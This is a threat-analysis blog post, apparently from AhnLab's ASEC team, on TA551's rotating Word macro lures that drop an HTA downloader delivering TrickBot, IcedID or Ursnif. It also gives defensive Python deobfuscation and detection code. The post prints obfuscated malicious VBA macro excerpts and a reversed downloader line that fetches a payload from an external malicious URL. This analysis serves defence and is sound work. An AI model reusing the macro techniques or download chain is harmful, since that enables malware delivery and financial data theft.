Continuously Changing Malicious Word Macro Being Distributed – Trend of TA551

The ASEC analysis team has been continuously posting information on malicious macro files and urging users to take caution. This post introduces a type of Word macro file recently distributed by the attack group TA551, which has been changing roughly once a week on average.

The group usually distributes its malware by emailing documents that contain malicious macros. The operation method is unchanged: once the macro is enabled, the DOC file drops an HTA file, which then downloads additional malware. The key change is in the type of malware that is downloaded at the end.

Figure 1. Operation method of malicious DOC macro distributed by TA551

The following is an explanation of how the malicious macro in the diagram above works.

The attacker sends an email with a malicious MS Word document attached. Once the recipient opens the email, saves the attachment, and enables the macro, a malicious HTA file is dropped. Code within the HTA file downloads additional malware from an external URL. If the URL is still valid, the final malware the attacker intended to distribute is downloaded and begins to run.

Figure 2. Names of DOC files, HTA, and DLL used in distributing TrickBot malware

The table above lists the names of the malicious DOC files used this time to distribute TrickBot, together with the names of the dropped HTA files (the DLL files use the same names).

The purpose behind distributing TrickBot has not changed much, and the same holds for the way the macro code operates in the continually altered malicious macro files used by the TA551 group. What is notable is that the final malware being downloaded is now varying: since last year, TA551 had steadily distributed IcedID.

Figure 3. Behaviors that are shown when enabling DOC macro (AhnLab RAPIT)

[document.xml] – excerpt

eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts

[Macro Code] – excerpt (two modules; the `Next cnt` lines missing from the excerpt are restored)

' Module 1: builds and runs "explorer c:\programdata\vbaQueryCount.hta"
Attribute VB_Name = "listboxArray"
Function templateCCurr(removeDocClass)
    Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
' The path and the ".hta" extension are split across default arguments, so no single string literal reads "hta"
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
    genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
' Decodes a numeric array by XOR-ing each element with 100; the loop starts at 1, so element 0 is skipped
Function initTitle(arr As Variant)
    Dim out As String
    out = ""
    For cnt = 1 To UBound(arr)
        out = out & Chr(arr(cnt) Xor 100)
    Next cnt
    initTitle = out
End Function

' Module 2: the same pattern with different names, "cmd /c c:\\users\\public\\winSelBefore.hta" and XOR key 101
Attribute VB_Name = "captionO"
Function lnkObject(queryArray)
    Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
    singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
' Same decoder as initTitle, but seeded with vbNullChar and keyed with 101
Function indexDocTmp(arr As Variant)
    Dim out As String
    out = vbNullChar
    For cnt = 1 To UBound(arr)
        out = out & Chr(arr(cnt) Xor 101)
    Next cnt
    indexDocTmp = out
End Function

Looking at the macro code of each changed version, the pattern is the same: the macro takes the already obfuscated data held in the document.xml object and uses it to create an HTA file that is obfuscated a second time. Even simple samples slightly change how the commands that execute the HTA file are combined. In certain types, the data in document.xml is obfuscated simply by reversing the text order, as shown above.
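The two decoding steps visible in the excerpts above (the reversed document.xml text and the XOR-with-key array decoder in the macro) can be emulated statically so the dropped HTA path and the commands a sample builds are recovered without enabling the macro. The following is an added example written for this post; it is not code from the ASEC post or from the TA551 macro. It uses the document.xml line quoted above as its stage 1 input, while the XOR-encoded arrays and the `looks_reversed` heuristic are constructed here for illustration. It assumes the macro modules do not set `Option Base 1`, so that a loop starting at index 1 skips element 0.

```python
# Added example (not from the ASEC post and not TA551's own code): emulates the two
# decoding steps visible in the excerpts above, so the commands a sample builds can
# be recovered statically instead of by enabling the macro.

VBS_TOKENS = ("xmlhttp", ".open", "savetofile", "createobject", "regsvr32")


def reverse_text(s: str) -> str:
    """Stage 1: the document.xml text is simply written backwards."""
    return s[::-1]


def looks_reversed(s: str) -> bool:
    """Heuristic (constructed for this example): the reversed form contains more
    known VBS/HTA tokens than the forward form. Handy when triaging document.xml
    without reading every string by hand."""
    fwd = sum(tok in s.lower() for tok in VBS_TOKENS)
    rev = sum(tok in s[::-1].lower() for tok in VBS_TOKENS)
    return rev > fwd


def xor_chr_decode(arr, key: int) -> str:
    """Stage 2, emulating initTitle (key 100) and indexDocTmp (key 101):
    For cnt = 1 To UBound(arr): out = out & Chr(arr(cnt) Xor key).
    VBA's Array() is zero-based unless Option Base 1 is set, so a loop starting at
    1 skips element 0. Assumption: the module has no Option Base 1, so element 0 is
    filler and is skipped here exactly as the macro's loop does."""
    return "".join(chr(v ^ key) for v in arr[1:])


def build_command(prefix: str, path_head="c:\\progra",
                  path_tail="mdata\\vbaQueryCount.h", ext="ta") -> str:
    """Emulates genericLnkResponse: path and extension are split across default
    arguments so no single literal in the module reads 'hta'."""
    return prefix + path_head + path_tail + ext


# document.xml line taken from the excerpt above (stage 1 input).
DOCUMENT_XML_LINE = '2 ,"gpj.neercSnoitpac\\atadmargorp\\:c" eliFoTevaS.maerts'

# Constructed arrays (not copied from a sample): the bytes of "hta" XOR-ed with each
# key, preceded by the filler element 0 that the loop skips. The small values show
# why a plain string search for "hta" inside the macro finds nothing.
ENCODED_HTA_KEY100 = [0, 12, 16, 5]
ENCODED_HTA_KEY101 = [0, 13, 17, 4]


def main():
    print(reverse_text(DOCUMENT_XML_LINE))          # stream.SaveToFile "c:\programdata\captionScreen.jpg", 2
    print(looks_reversed(DOCUMENT_XML_LINE))         # True
    print(xor_chr_decode(ENCODED_HTA_KEY100, 100))   # hta
    print(xor_chr_decode(ENCODED_HTA_KEY101, 101))   # hta
    print(build_command("explorer "))                # explorer c:\programdata\vbaQueryCount.hta


if __name__ == "__main__":
    main()
```

To apply this to a real sample, extract `word/document.xml` from the DOCX/DOC container with a tool such as olevba or by unzipping, feed each suspicious string to `looks_reversed`, and paste the numeric arrays from the macro into `xor_chr_decode` with the key used in the corresponding `Chr(... Xor N)` call.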

Figure 4. Malicious DOC macro file

Figure 5. Part of dropped HTA file after macro is run

Figure 6. Result of unobfuscating part of HTA data

In the recently distributed sample, enabling the macro in the Word file shown in Figure 4 drops the HTA file shown in Figure 5 to the C:\ProgramData path. Unobfuscating part of the code within the HTA file reveals code that downloads additional malware (vbaQueryCount.jpg) from an external malicious URL and saves it to the C:\Users\Public path. The downloaded .jpg file is not an image; it is the DLL malware, which is executed with regsvr32.exe.
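A payload that is really a DLL wearing a .jpg extension gives itself away in its first bytes. The following added example, written for this post and not taken from the ASEC analysis, reads the MZ/PE header to classify a downloaded file and flags a PE image stored under a non-executable extension. The sample inputs (a minimal hand-built PE header and a JPEG start-of-image marker) are constructed here and are not real payloads; the `C:\Users\Public\vbaQueryCount.jpg` path mirrors the drop location named above.

```python
# Added example (not from the ASEC post): decides what a downloaded "image" really is
# by reading its header instead of trusting the extension, which is how the
# vbaQueryCount.jpg payload described above gives itself away.
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
PE_EXTENSIONS = (".dll", ".exe", ".ocx", ".sys", ".drv", ".cpl", ".scr")


def classify_payload(data: bytes) -> str:
    """Return 'jpeg', 'pe-dll', 'pe-exe' or 'unknown' from the file header."""
    if data[:3] == b"\xff\xd8\xff":          # JPEG SOI marker
        return "jpeg"
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "unknown"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE header
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "unknown"
    # The COFF file header follows the 4-byte signature; Characteristics is its
    # last field, 18 bytes in (Machine 2, NumberOfSections 2, TimeDateStamp 4,
    # PointerToSymbolTable 4, NumberOfSymbols 4, SizeOfOptionalHeader 2).
    characteristics = struct.unpack_from("<H", data, e_lfanew + 4 + 18)[0]
    if characteristics & IMAGE_FILE_DLL:
        return "pe-dll"
    if characteristics & IMAGE_FILE_EXECUTABLE_IMAGE:
        return "pe-exe"
    return "unknown"


def masquerading_pe(path: str, data: bytes) -> bool:
    """True when the content is a PE image but the extension claims otherwise."""
    kind = classify_payload(data)
    return kind.startswith("pe-") and not path.lower().endswith(PE_EXTENSIONS)


def make_fake_pe(characteristics: int) -> bytes:
    """Constructed test input: a minimal MZ/PE header, not a loadable image."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0xF0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    # Constructed inputs; the path mirrors the drop location named in the post.
    dll_disguised = make_fake_pe(IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_DLL)
    real_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, blob in (("vbaQueryCount.jpg", dll_disguised), ("photo.jpg", real_jpeg)):
        path = "C:\\Users\\Public\\" + name
        verdict = "masquerading" if masquerading_pe(path, blob) else "ok"
        print(path, classify_payload(blob), verdict)
```

When checking a file on disk, pass at least the first few kilobytes (`open(p, "rb").read(4096)`): `e_lfanew` can point past the first 512 bytes in some images, and the function deliberately answers `unknown` rather than guessing when the PE header is outside the bytes it was given.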

Figure 7. TrickBot malware downloaded after disguising itself as an image file with jpg extension

Figure 8. Ultimate dll file operated by TrickBot (AhnLab RAPIT)

TrickBot, the malware that is ultimately downloaded, attempts to steal sensitive information such as web browser data and financial transaction details from the user's PC. As shown in Figure 8 (a process tree from AhnLab RAPIT, AhnLab's malware auto-analysis infrastructure), it collects information about the infected PC using legitimate system utilities such as ipconfig.exe, net.exe, and nltest.exe.
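The chain described in this post leaves two behaviours that can be detected from process-creation telemetry: regsvr32.exe being handed a module that does not end in .dll, and one process launching several of the reconnaissance utilities named above within a short window. The following is an added example written for this post, not ASEC's detection logic. It runs both checks over constructed, simplified process-creation events (timestamp, PID, parent PID, image, command line) that are modelled on the chain above; the timestamps, PIDs and parent relationships are invented for the sample, and the 60-second window and the two-tool threshold are tuning choices, not values from the post.

```python
# Added example (not from the ASEC post): two detections for the behaviour described
# above, run over constructed process-creation events. Field layout is
# timestamp|ProcessId|ParentProcessId|Image|CommandLine (a simplified Sysmon EID 1).
from collections import defaultdict
from datetime import datetime, timedelta

RECON_TOOLS = {"ipconfig.exe", "net.exe", "nltest.exe"}  # utilities named in the post
WINDOW = timedelta(seconds=60)     # tuning choice (assumption)
MIN_DISTINCT_TOOLS = 2             # tuning choice (assumption)

# Constructed sample events: paths mirror the post, everything else is invented.
SAMPLE_EVENTS = [
    "2021-06-10T09:00:01|1200|800|C:\\Windows\\explorer.exe|explorer c:\\programdata\\vbaQueryCount.hta",
    "2021-06-10T09:00:02|1300|1200|C:\\Windows\\System32\\mshta.exe|mshta c:\\programdata\\vbaQueryCount.hta",
    "2021-06-10T09:00:05|1400|1300|C:\\Windows\\System32\\regsvr32.exe|regsvr32 c:\\users\\public\\vbaQueryCount.jpg",
    "2021-06-10T09:00:20|1500|1400|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all",
    "2021-06-10T09:00:21|1510|1400|C:\\Windows\\System32\\net.exe|net view /all",
    "2021-06-10T09:00:22|1520|1400|C:\\Windows\\System32\\nltest.exe|nltest /domain_trusts",
    # Benign noise: an admin running a single ipconfig from a shell an hour later.
    "2021-06-10T10:15:00|2000|900|C:\\Windows\\System32\\cmd.exe|cmd.exe",
    "2021-06-10T10:15:03|2010|2000|C:\\Windows\\System32\\ipconfig.exe|ipconfig",
]


def parse_event(line: str) -> dict:
    ts, pid, ppid, image, cmdline = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid), "ppid": int(ppid),
            "image": image, "name": image.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}


def regsvr32_non_dll(ev: dict) -> bool:
    """regsvr32 registering a module whose extension is not .dll (e.g. a .jpg)."""
    if ev["name"] != "regsvr32.exe":
        return False
    tokens = ev["cmdline"].split()
    target = tokens[-1].strip('"').lower() if len(tokens) > 1 else ""
    return bool(target) and not target.endswith(".dll")


def recon_bursts(events: list) -> list:
    """Parents that spawn >= MIN_DISTINCT_TOOLS different recon tools inside WINDOW."""
    by_parent = defaultdict(list)
    for ev in events:
        if ev["name"] in RECON_TOOLS:
            by_parent[ev["ppid"]].append(ev)
    hits = []
    for ppid, children in by_parent.items():
        children.sort(key=lambda e: e["ts"])
        for i, first in enumerate(children):
            window = [c for c in children[i:] if c["ts"] - first["ts"] <= WINDOW]
            tools = {c["name"] for c in window}
            if len(tools) >= MIN_DISTINCT_TOOLS:
                hits.append((ppid, sorted(tools)))
                break
    return hits


def detect(lines: list) -> list:
    """Return (rule, pid, detail) tuples for every match in the given event lines."""
    events = [parse_event(line) for line in lines]
    findings = []
    for ev in events:
        if regsvr32_non_dll(ev):
            findings.append(("regsvr32_non_dll", ev["pid"], ev["cmdline"]))
    for ppid, tools in recon_bursts(events):
        findings.append(("recon_burst", ppid, ",".join(tools)))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Both rules fire on the constructed chain (the regsvr32 process, PID 1400, is also the parent of the three recon utilities), while the lone ipconfig from cmd.exe stays quiet. In production the recon-burst rule is the noisier of the two, so it is worth correlating the parent with the regsvr32 finding before alerting.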

The recent trend shows that the final payload has rotated among financial information-stealing malware families:

  • IcedID download type
  • Ursnif download type
  • Trickbot download type

Users should refrain from opening emails from unknown sources and should not run or enable macros in downloaded attachments. If the macro security level of the document program is set to low, macros may run automatically without any notification, so users should keep the security level high to prevent unintended features from running.

Users are also advised to update their anti-malware engine to the latest pattern version.

AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.

[File Detection]


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
